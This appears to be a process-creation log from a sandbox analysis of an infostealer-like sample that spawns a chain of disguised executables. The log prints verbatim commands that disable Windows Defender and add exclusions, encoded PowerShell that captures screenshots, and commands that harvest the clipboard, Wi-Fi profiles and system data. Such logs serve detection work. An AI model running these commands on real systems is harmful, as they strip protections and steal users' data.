Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Users\user\AppData\Roaming\RuntimeBroker.exe "C:\Users\user\AppData\Roaming\RuntimeBroker.exe"
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe "C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe"
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Process created: C:\Users\user\AppData\Roaming\RuntimeBroker.exe "C:\Users\user\AppData\Roaming\RuntimeBroker.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7176 -ip 7176
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7176 -s 2308
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe -pbeznogym
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv qGOEROT6yEajSrP7aJ1lsw.0.2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\svchost.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5269.tmp" "c:\Windows\System32\CSCCC22D6FAD44545049E46F17EB7F694E7.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5528.tmp" "c:\Users\user\AppData\Local\Temp\r1ffbxq0\CSCD4520F5E8E664C3288A2F8DB92B7943B.TMP"
Source: unknown	Process created: C:\Users\user\cscript.exe C:\Users\user\cscript.exe
Source: unknown	Process created: C:\Users\user\cscript.exe C:\Users\user\cscript.exe
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA="	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA="	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Users\user\AppData\Roaming\RuntimeBroker.exe "C:\Users\user\AppData\Roaming\RuntimeBroker.exe"	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process created: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe "C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Process created: C:\Users\user\AppData\Roaming\RuntimeBroker.exe "C:\Users\user\AppData\Roaming\RuntimeBroker.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7176 -ip 7176	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7176 -s 2308	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe -pbeznogym
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
